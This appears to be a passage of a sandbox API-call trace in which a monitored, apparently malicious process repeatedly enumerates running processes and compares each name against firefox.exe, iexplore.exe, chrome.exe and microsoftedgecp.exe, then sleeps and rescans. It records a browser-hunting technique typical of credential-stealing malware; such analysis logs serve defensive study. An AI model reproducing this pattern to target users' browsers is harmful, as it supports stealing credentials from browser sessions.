lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0202.264] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0202.264] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0202.264] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0202.264] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.264] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0202.264] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0202.264] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0202.264] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0202.264] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.264] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0202.265] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0202.265] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0202.265] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0202.265] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.265] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0202.265] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0202.265] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0202.265] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0202.265] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.265] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0202.266] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0202.266] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0202.266] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0202.266] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.266] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0202.266] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0202.267] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0202.267] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0202.267] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.267] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0202.267] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0202.267] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0202.267] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0202.267] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.267] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0202.268] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0202.268] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0202.268] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0202.268] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.268] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0202.268] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0202.268] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0202.268] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0202.268] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.268] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0202.269] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0202.269] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0202.269] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0202.269] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.269] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0202.269] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0202.269] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0202.269] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0202.269] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.269] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0202.270] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0202.270] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0202.270] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0202.270] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.270] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0202.270] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0202.271] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0202.271] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0202.271] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.271] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0202.271] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0202.271] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0202.271] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0202.271] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.271] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0202.272] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0202.272] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0202.272] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0202.272] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.272] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0202.272] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0202.272] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0202.272] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0202.272] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.272] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0202.273] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0202.273] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0202.273] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0202.273] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.273] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0202.273] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0202.273] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0202.273] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0202.273] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.273] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0202.274] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0202.274] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0202.274] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0202.274] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.274] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0202.275] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0202.275] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0202.275] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0202.275] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.275] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0202.275] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0202.275] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0202.275] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0202.275] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.275] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0202.276] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0202.276] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0202.276] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0202.276] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.276] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0202.276] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0202.276] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0202.276] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0202.276] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.276] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.277] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0202.277] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0202.277] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0202.277] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.277] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0202.277] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0202.277] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0202.277] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0202.277] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.277] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.278] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0202.278] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0202.278] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0202.278] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.278] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0202.279] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0202.279] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0202.279] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0202.279] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.279] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.279] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0202.279] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0202.279] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0202.279] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.279] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0202.330] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0202.330] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0202.330] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0202.330] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.330] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0202.331] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0202.331] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0202.331] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0202.331] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.331] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0202.332] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0202.332] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0202.332] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0202.332] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.332] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0202.332] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0202.332] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0202.332] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0202.332] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.332] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0202.333] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0202.333] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0202.333] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0202.333] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.333] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0202.333] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0202.333] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0202.333] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0202.333] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.333] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0202.334] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0202.334] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0202.334] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0202.334] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.334] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0202.335] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0202.335] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0202.335] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0202.335] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0202.335] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0202.335] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0202.335] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0202.335] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0202.335] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.335] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0202.336] CloseHandle (hObject=0xd4) returned 1 [0202.336] Sleep (dwMilliseconds=0x3e8) [0203.450] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0203.452] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.453] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0203.453] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0203.453] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0203.453] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0203.453] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0203.454] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0203.454] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0203.454] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0203.454] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0203.454] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0203.454] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0203.454] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0203.454] lstrcmpiA (lpString1="smss.exe", 